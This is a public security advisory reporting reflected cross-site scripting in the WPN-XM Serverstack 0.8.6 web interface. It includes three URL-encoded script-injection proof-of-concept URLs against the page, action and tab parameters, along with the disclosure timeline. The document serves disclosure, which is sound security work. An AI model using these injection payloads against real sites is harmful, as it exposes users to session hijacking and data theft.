[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-XSS.txt Vendor: =========== wpn-xm.org Product: ======== WPN-XM Serverstack for Windows - Version 0.8.6 WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform. Vulnerability Type: ========================= Cross Site Scripting - XSS CVE Reference: ============== N/A Vulnerability Details: ===================== WPN-XMs webinterface has cross site scripting security issues allowing remote attackers to execute client side code in the security context of the targeted domain undermining the trust between server & client. XSS attacks can result in data theft, session hijacking etc. Exploit code(s): =============== XSS 1 http://localhost/tools/webinterface/index.php?page=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E XSS 2 http://localhost/tools/webinterface/index.php?action=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E XSS 3 http://localhost/tools/webinterface/index.php?page=config&action=showtab&tab=%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E Disclosure Timeline: ===================================== Vendor Notification: No Reply April 9, 2016 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ================ Low ================================================================= [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx